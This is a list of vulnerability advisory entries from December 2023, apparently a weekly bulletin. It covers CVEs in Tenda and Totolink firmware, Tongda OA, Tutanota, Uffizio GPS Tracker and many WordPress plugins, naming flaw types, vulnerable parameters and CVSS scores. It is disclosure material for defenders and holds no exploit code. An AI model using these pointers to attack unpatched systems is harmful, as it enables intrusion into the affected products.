tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a buffer overflow via the rebootTime parameter in the sysScheduleRebootSet function. 2023-12-20 9.8 CVE-2023-50990
cve@mitre.org
tenda — i29_firmware Tenda i29 v1.0 V1.0.0.5 was discovered to contain a stack overflow via the ip parameter in the setPing function. 2023-12-20 9.8 CVE-2023-50992
cve@mitre.org
tongda — tongda_office_anywhere A vulnerability was found in Tongda OA 2017 up to 11.10. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file general/vote/manage/delete.php. The manipulation of the argument DELETE_STR leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-248245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-16 9.8 CVE-2023-6885
cna@vuldb.com
totolink — a7100ru_firmware A vulnerability, which was classified as critical, was found in Totolink A7100RU 7.4cu.2313_B20191024. Affected is the function main of the file /cgi-bin/cstecgi.cgi?action=login of the component HTTP POST Request Handler. The manipulation of the argument flag with the input ie8 leads to buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248268. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-18 9.8 CVE-2023-6906
cna@vuldb.com
tutao — tutanota Tutanota (Tuta Mail) is an encrypted email provider. Tutanota allows users to open links in emails in external applications. Prior to version 3.118.12, it correctly blocks the `file:` URL scheme, which can be used by malicious actors to gain code execution on a victim’s computer, but fails to check other harmful schemes such as `ftp:`, `smb:`, etc., which can also be used. Successful exploitation of this vulnerability will enable an attacker to gain code execution on a victim’s computer. Version 3.118.2 contains a patch for this issue. 2023-12-15 9.3 CVE-2023-46116
security-advisories@github.com
u-blox — toby-l2 A flaw in the input validation in TOBY-L2 allows a user to execute arbitrary operating system commands using specifically crafted AT commands. This vulnerability requires physical access to the serial interface of the module or the ability to modify the system or software which uses its serial interface to send malicious AT commands. Exploitation of the vulnerability gives full administrative (root) privileges to the attacker to execute any operating system command on TOBY-L2, which can lead to modification of the behavior of the module itself as well as the components connected with it (depending on its rights on other connected systems). It can further provide the ability to read system level files and hamper the availability of the module as well. This issue affects TOBY-L2 series: TOBY-L200, TOBY-L201, TOBY-L210, TOBY-L220, TOBY-L280. 2023-12-20 7.6 CVE-2023-0011
vulnerability@ncsc.ch
uffizio — gps_tracker A Remote Code Execution vulnerability exists in Uffizio’s GPS Tracker all versions. The web server can be compromised by uploading and executing a web/reverse shell. An attacker could then run commands, browse system files, and browse local resources. 2023-12-16 9.8 CVE-2020-17485
cve@mitre.org
uffizio — gps_tracker An improper access control vulnerability exists in Uffizio’s GPS Tracker all versions that leads to sensitive information disclosure of all the connected devices. By visiting the vulnerable host at port 9000, we see it responds with a JSON body that has all the details about the devices which have been deployed. 2023-12-16 7.5 CVE-2020-17483
cve@mitre.org
unrealircd — unrealircd A buffer overflow in websockets in UnrealIRCd 6.1.0 through 6.1.3 before 6.1.4 allows an unauthenticated remote attacker to crash the server by sending an oversized packet (if a websocket port is open). Remote code execution might be possible on some uncommon, older platforms. 2023-12-16 7.5 CVE-2023-50784
cve@mitre.org
wangmarket — wangmarket A vulnerability was found in xnx3 wangmarket 6.1. It has been rated as critical. Affected by this issue is some unknown functionality of the component Role Management Page. The manipulation leads to code injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248246 is the identifier assigned to this vulnerability. 2023-12-17 9.8 CVE-2023-6886
cna@vuldb.com
wasmer_io — wasmer Wasmer is a WebAssembly runtime that enables containers to run anywhere: from Desktop to the Cloud, Edge and even the browser. Wasm programs can access the filesystem outside of the sandbox. Service providers running untrusted Wasm code on Wasmer can unexpectedly expose the host filesystem. This vulnerability has been patched in version 4.2.4. 2023-12-22 8.4 CVE-2023-51661
security-advisories@github.com
web-soudan — mw_wp_form The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-16 9.8 CVE-2023-6559
security@wordfence.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Zendrop Zendrop – Global Dropshipping. This issue affects Zendrop – Global Dropshipping: from n/a through 1.0.0. 2023-12-20 10 CVE-2023-25970
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.0. 2023-12-20 10 CVE-2023-29384
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Phpbits Creative Studio Genesis Simple Love. This issue affects Genesis Simple Love: from n/a through 2.0. 2023-12-20 10 CVE-2023-49772
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Tim Brattberg BCorp Shortcodes. This issue affects BCorp Shortcodes: from n/a through 0.23. 2023-12-20 10 CVE-2023-49773
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. 2023-12-21 10 CVE-2023-49778
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WooRockets Corsa. This issue affects Corsa: from n/a through 1.5. 2023-12-20 9.9 CVE-2023-23970
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Themely Theme Demo Import. This issue affects Theme Demo Import: from n/a through 1.1.1. 2023-12-20 9.1 CVE-2023-28170
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Olive Themes Olive One Click Demo Import. This issue affects Olive One Click Demo Import: from n/a through 1.1.1. 2023-12-20 9.1 CVE-2023-29102
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in AmaderCode Lab Dropshipping & Affiliation with Amazon. This issue affects Dropshipping & Affiliation with Amazon: from n/a through 2.1.2. 2023-12-20 9.9 CVE-2023-31215
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Unlimited Elements Unlimited Elements For Elementor (Free Widgets, Addons, Templates). This issue affects Unlimited Elements For Elementor (Free Widgets, Addons, Templates): from n/a through 1.5.65. 2023-12-20 9.9 CVE-2023-31231
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in xtemos WoodMart – Multipurpose WooCommerce Theme. This issue affects WoodMart – Multipurpose WooCommerce Theme: from n/a through 1.0.36. 2023-12-21 9.8 CVE-2023-32242
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Daniel Söderström / Sidney van de Stouwe Subscribe to Category. This issue affects Subscribe to Category: from n/a through 2.7.4. 2023-12-20 9.3 CVE-2023-32590
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.40. 2023-12-20 9.9 CVE-2023-33318
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in WPChill Download Monitor. This issue affects Download Monitor: from n/a through 4.8.3. 2023-12-20 9.9 CVE-2023-34007
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Akshay Menariya Export Import Menus. This issue affects Export Import Menus: from n/a through 1.8.0. 2023-12-20 9.9 CVE-2023-34385
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in realmag777 HUSKY – Products Filter for WooCommerce Professional. This issue affects HUSKY – Products Filter for WooCommerce Professional: from n/a through 1.3.4.2. 2023-12-20 9.8 CVE-2023-40010
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Premio Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager. This issue affects Folders – Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager: from n/a through 2.9.2. 2023-12-20 9.1 CVE-2023-40204
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Jeff Starr User Submitted Posts – Enable Users to Submit Posts from the Front End. This issue affects User Submitted Posts – Enable Users to Submit Posts from the Front End: from n/a through 20230902. 2023-12-20 9 CVE-2023-45603
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. 2023-12-20 9.9 CVE-2023-46149
audit@patchstack.com
wordpress — wordpress Missing Authorization vulnerability in Clever plugins Delete Duplicate Posts allows Accessing Functionality Not Properly Constrained by ACLs. This issue affects Delete Duplicate Posts: from n/a through 4.8.9. 2023-12-19 9.8 CVE-2023-47754
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Porto Theme Porto Theme – Functionality. This issue affects Porto Theme – Functionality: from n/a before 2.12.1. 2023-12-19 9.3 CVE-2023-48738
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoonthemes Couponis – Affiliate & Submitting Coupons WordPress Theme. This issue affects Couponis – Affiliate & Submitting Coupons WordPress Theme: from n/a before 2.2. 2023-12-19 9.8 CVE-2023-49750
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Spoon themes Adifier – Classified Ads WordPress Theme. This issue affects Adifier – Classified Ads WordPress Theme: from n/a before 3.1.4. 2023-12-20 9.3 CVE-2023-49752
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Hakan Demiray Sayfa Sayac. This issue affects Sayfa Sayac: from n/a through 2.6. 2023-12-20 9.3 CVE-2023-49776
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in Symbiostock symbiostock. This issue affects Symbiostock: from n/a through 6.0.0. 2023-12-20 9.1 CVE-2023-49814
audit@patchstack.com
wordpress — wordpress The Theme My Login 2FA WordPress plugin before 1.2 does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn’t be too long, as the 2FA codes are 6 digits. 2023-12-18 9.8 CVE-2023-6272
contact@wpscan.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Webbjocke Simple Wp Sitemap. This issue affects Simple Wp Sitemap: from n/a through 1.2.1. 2023-12-17 8.8 CVE-2023-24380
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Rocketgenius Inc. Gravity Forms. This issue affects Gravity Forms: from n/a through 2.7.3. 2023-12-20 8.3 CVE-2023-28782
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BestWebSoft Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress. This issue affects Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress: from n/a through 1.7.0. 2023-12-20 8.5 CVE-2023-29096
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Favethemes Houzez – Real Estate WordPress Theme. This issue affects Houzez – Real Estate WordPress Theme: from n/a before 2.8.3. 2023-12-20 8.2 CVE-2023-29432
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Themefic Ultimate Addons for Contact Form 7. This issue affects Ultimate Addons for Contact Form 7: from n/a through 3.1.23. 2023-12-20 8.5 CVE-2023-30495
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CreativeMindsSolutions CM Popup Plugin for WordPress. This issue affects CM Popup Plugin for WordPress: from n/a through 1.5.10. 2023-12-20 8.5 CVE-2023-30750
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Foxskav Easy Bet. This issue affects Easy Bet: from n/a through 1.0.2. 2023-12-20 8.1 CVE-2023-31092
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in CrawlSpider SEO Change Monitor – Track Website Changes. This issue affects SEO Change Monitor – Track Website Changes: from n/a through 1.2. 2023-12-20 8.5 CVE-2023-33209
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tagbox Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics. This issue affects Tagbox – UGC Galleries, Social Media Widgets, User Reviews & Analytics: from n/a through 3.1. 2023-12-18 8.8 CVE-2023-33214
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Alex Raven WP Report Post allows SQL Injection. This issue affects WP Report Post: from n/a through 2.1.2. 2023-12-18 8.8 CVE-2023-34168
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Square. This issue affects WooCommerce Square: from n/a through 3.8.1. 2023-12-20 8.1 CVE-2023-35876
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Themesflat Themesflat Addons For Elementor. This issue affects Themesflat Addons For Elementor: from n/a through 2.0.0. 2023-12-19 8.3 CVE-2023-37390
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce GoCardless. This issue affects GoCardless: from n/a through 2.5.6. 2023-12-20 8.2 CVE-2023-37871
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in UX-themes Flatsome | Multi-Purpose Responsive WooCommerce Theme. This issue affects Flatsome | Multi-Purpose Responsive WooCommerce Theme: from n/a through 3.17.5. 2023-12-20 8.3 CVE-2023-40555
audit@patchstack.com
wordpress — wordpress The Vrm 360 3D Model Viewer WordPress plugin through 1.2.1 is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 2023-12-18 8.8 CVE-2023-4311
contact@wpscan.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in TienCOP WP EXtra allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects WP EXtra: from n/a through 6.2. 2023-12-19 8.8 CVE-2023-46212
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in AdFoxly AdFoxly – Ad Manager, AdSense Ads & Ads.Txt. This issue affects AdFoxly – Ad Manager, AdSense Ads & Ads.Txt: from n/a through 1.8.5. 2023-12-18 8.8 CVE-2023-46617
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Master slider Master Slider Pro allows SQL Injection. This issue affects Master Slider Pro: from n/a through 3.6.5. 2023-12-18 8.8 CVE-2023-47506
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 2.0.3. 2023-12-18 8.8 CVE-2023-47787
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WooCommerce Canada Post Shipping Method. This issue affects Canada Post Shipping Method: from n/a through 2.8.3. 2023-12-18 8.8 CVE-2023-47789
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Saint Systems Disable User Login. This issue affects Disable User Login: from n/a through 1.3.7. 2023-12-18 8.8 CVE-2023-47806
audit@patchstack.com
wordpress — wordpress Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Roland Barker, xnau webdesign Participants Database allows Accessing Functionality Not Properly Constrained by ACLs, Cross Site Request Forgery. This issue affects Participants Database: from n/a through 2.5.5. 2023-12-19 8.8 CVE-2023-48751
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.4. 2023-12-18 8.8 CVE-2023-48755
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Crocoblock JetElements For Elementor. This issue affects JetElements For Elementor: from n/a through 2.6.13. 2023-12-18 8.8 CVE-2023-48762
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SVGator SVGator – Add Animated SVG Easily. This issue affects SVGator – Add Animated SVG Easily: from n/a through 1.2.4. 2023-12-18 8.8 CVE-2023-48766
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in CodeAstrology Team Quantity Plus Minus Button for WooCommerce by CodeAstrology. This issue affects Quantity Plus Minus Button for WooCommerce by CodeAstrology: from n/a through 1.1.9. 2023-12-18 8.8 CVE-2023-48768
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Blue Coral Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back. This issue affects Chat Bubble – Floating Chat with Contact Chat Icons, Messages, Telegram, Email, SMS, Call me back: from n/a through 2.3. 2023-12-18 8.8 CVE-2023-48769
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Arul Prasad J Prevent Landscape Rotation. This issue affects Prevent Landscape Rotation: from n/a through 2.0. 2023-12-18 8.8 CVE-2023-48772
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in WP Doctor WooCommerce Login Redirect. This issue affects WooCommerce Login Redirect: from n/a through 2.2.4. 2023-12-18 8.8 CVE-2023-48773
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in VillaTheme Product Size Chart For WooCommerce. This issue affects Product Size Chart For WooCommerce: from n/a through 1.1.5. 2023-12-18 8.8 CVE-2023-48778
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Marketing Rapel MkRapel Regiones y Ciudades de Chile para WC. This issue affects MkRapel Regiones y Ciudades de Chile para WC: from n/a through 4.3.0. 2023-12-18 8.8 CVE-2023-48781
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Saiful Islam Add to Cart Text Changer and Customize Button, Add Custom Icon. This issue affects Add to Cart Text Changer and Customize Button, Add Custom Icon: from n/a through 2.0. 2023-12-18 8.8 CVE-2023-49153
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Wow-Company Button Generator – easily Button Builder. This issue affects Button Generator – easily Button Builder: from n/a through 2.3.8. 2023-12-18 8.8 CVE-2023-49155
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Michael Winkler teachPress. This issue affects teachPress: from n/a through 9.0.5. 2023-12-18 8.8 CVE-2023-49163
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in OceanWP Ocean Extra. This issue affects Ocean Extra: from n/a through 2.2.2. 2023-12-19 8.8 CVE-2023-49164
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Apasionados, Apasionados del Marketing, NetConsulting DoFollow Case by Case. This issue affects DoFollow Case by Case: from n/a through 3.4.2. 2023-12-15 8.8 CVE-2023-49197
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gift Up Gift Up Gift Cards for WordPress and WooCommerce. This issue affects Gift Up Gift Cards for WordPress and WooCommerce: from n/a through 2.21.3. 2023-12-15 8.8 CVE-2023-49744
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SureTriggers SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!. This issue affects SureTriggers – Connect All Your Plugins, Apps, Tools & Automate Everything!: from n/a through 1.0.23. 2023-12-15 8.8 CVE-2023-49749
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Ciprian Popescu Block for Font Awesome. This issue affects Block for Font Awesome: from n/a through 1.4.0. 2023-12-17 8.8 CVE-2023-49751
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team WooDiscuz – WooCommerce Comments. This issue affects WooDiscuz – WooCommerce Comments: from n/a through 2.3.0. 2023-12-18 8.8 CVE-2023-49759
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Giannopoulos Kostas WPsoonOnlinePage. This issue affects WPsoonOnlinePage: from n/a through 1.9. 2023-12-18 8.8 CVE-2023-49760
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Gravity Master Product Enquiry for WooCommerce. This issue affects Product Enquiry for WooCommerce: from n/a through 3.0. 2023-12-18 8.8 CVE-2023-49761
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Creatomatic Ltd CSprite. This issue affects CSprite: from n/a through 1.1. 2023-12-18 8.8 CVE-2023-49763
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in SoftLab Integrate Google Drive. This issue affects Integrate Google Drive: from n/a through 1.3.4. 2023-12-17 8.8 CVE-2023-49769
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Denis Kobozev CSV Importer. This issue affects CSV Importer: from n/a through 0.3.8. 2023-12-17 8.8 CVE-2023-49775
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Innovative Solutions Fix My Feed RSS Repair. This issue affects Fix My Feed RSS Repair: from n/a through 1.4. 2023-12-17 8.8 CVE-2023-49816
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PixelYourSite Product Catalog Feed by PixelYourSite. This issue affects Product Catalog Feed by PixelYourSite: from n/a through 2.1.1. 2023-12-17 8.8 CVE-2023-49824
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in realmag777 FOX – Currency Switcher Professional for WooCommerce. This issue affects FOX – Currency Switcher Professional for WooCommerce: from n/a through 1.4.1.4. 2023-12-17 8.8 CVE-2023-49834
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Palscode Multi Currency For WooCommerce. This issue affects Multi Currency For WooCommerce: from n/a through 1.5.5. 2023-12-18 8.8 CVE-2023-49840
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in QuanticEdge First Order Discount Woocommerce. This issue affects First Order Discount Woocommerce: from n/a through 1.21. 2023-12-18 8.8 CVE-2023-49843
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Kevin Ohashi WPPerformanceTester. This issue affects WPPerformanceTester: from n/a through 2.0.0. 2023-12-18 8.8 CVE-2023-49844
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in PayTR Ödeme ve Elektronik Para Kuruluşu A.Ş. PayTR Taksit Tablosu – WooCommerce. This issue affects PayTR Taksit Tablosu – WooCommerce: from n/a through 1.3.1. 2023-12-18 8.8 CVE-2023-49853
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Tribe Interactive Caddy – Smart Side Cart for WooCommerce. This issue affects Caddy – Smart Side Cart for WooCommerce: from n/a through 1.9.7. 2023-12-18 8.8 CVE-2023-49854
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in BinaryCarpenter Menu Bar Cart Icon For WooCommerce By Binary Carpenter. This issue affects Menu Bar Cart Icon For WooCommerce By Binary Carpenter: from n/a through 1.49.3. 2023-12-18 8.8 CVE-2023-49855
audit@patchstack.com
wordpress — wordpress Cross-Site Request Forgery (CSRF) vulnerability in Hiroaki Miyashita Custom Post Type Page Template. This issue affects Custom Post Type Page Template: from n/a through 1.1. 2023-12-18 8.8 CVE-2023-50372
audit@patchstack.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. 2023-12-18 8.8 CVE-2023-5882
contact@wpscan.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 2023-12-18 8.8 CVE-2023-5886
contact@wpscan.com
wordpress — wordpress The Essential Real Estate plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘ajaxUploadFonts’ function in versions up to, and including, 4.3.5. This makes it possible for authenticated attackers with subscriber-level capabilities or above, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 8.8 CVE-2023-6827
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Remote File Inclusion in versions 1.0.8 to 1.3.9 via the ‘content-dir’ HTTP header. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code execution. NOTE: Successful exploitation of this vulnerability requires that the target server’s php.ini is configured with ‘allow_url_include’ set to ‘on’. This feature is deprecated as of PHP 7.4 and is disabled by default, but can still be explicitly enabled in later versions of PHP. 2023-12-23 8.1 CVE-2023-6971
security@wordfence.com
wordpress — wordpress The Widget Settings Importer/Exporter Plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the wp_ajax_import_widget_dataparameter AJAX action in versions up to, and including, 1.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers with subscriber-level permissions and above to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. 2023-12-23 7.4 CVE-2020-36769
security@wordfence.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in weDevs Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy. This issue affects Dokan – Best WooCommerce Multivendor Marketplace Solution – Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.12. 2023-12-20 7.1 CVE-2023-26525
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Page Visit Counter Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress. This issue affects Advanced Page Visit Counter – Most Wanted Analytics Plugin for WordPress: from n/a through 6.4.2. 2023-12-20 7.1 CVE-2023-28788
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in BannerSky BSK Forms Blacklist. This issue affects BSK Forms Blacklist: from n/a through 3.6.2. 2023-12-20 7.6 CVE-2023-30872
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Adastra Crypto Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free. This issue affects Cryptocurrency Payment & Donation Box – Accept Payments in any Cryptocurrency on your WP Site for Free: from n/a through 2.2.7. 2023-12-20 7.2 CVE-2023-32128
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 5.7.1. 2023-12-20 7.6 CVE-2023-32743
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce Product Vendors allows SQL Injection. This issue affects Product Vendors: from n/a through 2.1.76. 2023-12-18 7.2 CVE-2023-33331
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce Woo Subscriptions. This issue affects Woo Subscriptions: from n/a through 5.1.2. 2023-12-20 7.5 CVE-2023-35914
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. 2023-12-20 7.6 CVE-2023-35915
audit@patchstack.com
wordpress — wordpress Authorization Bypass Through User-Controlled Key vulnerability in Automattic WooPayments – Fully Integrated Solution Built and Supported by Woo. This issue affects WooPayments – Fully Integrated Solution Built and Supported by Woo: from n/a through 5.9.0. 2023-12-20 7.5 CVE-2023-35916
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in MainWP MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance. This issue affects MainWP Dashboard – WordPress Manager for Multiple Websites Maintenance: from n/a through 4.4.3.3. 2023-12-20 7.6 CVE-2023-38519
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Themify Themify Ultra. This issue affects Themify Ultra: from n/a through 7.3.5. 2023-12-20 7.4 CVE-2023-46147
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in E2Pdf.Com E2Pdf – Export To Pdf Tool for WordPress. This issue affects E2Pdf – Export To Pdf Tool for WordPress: from n/a through 1.20.18. 2023-12-19 7.2 CVE-2023-46154
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Avirtum iPages Flipbook For WordPress. This issue affects iPages Flipbook For WordPress: from n/a through 1.4.8. 2023-12-20 7.6 CVE-2023-47236
audit@patchstack.com
wordpress — wordpress The Export any WordPress data to XML/CSV WordPress plugin before 1.4.0, WP All Export Pro WordPress plugin before 1.8.6 does not validate and sanitize the `wp_query` parameter, which allows an attacker to run arbitrary commands on the remote server. 2023-12-18 7.2 CVE-2023-4724
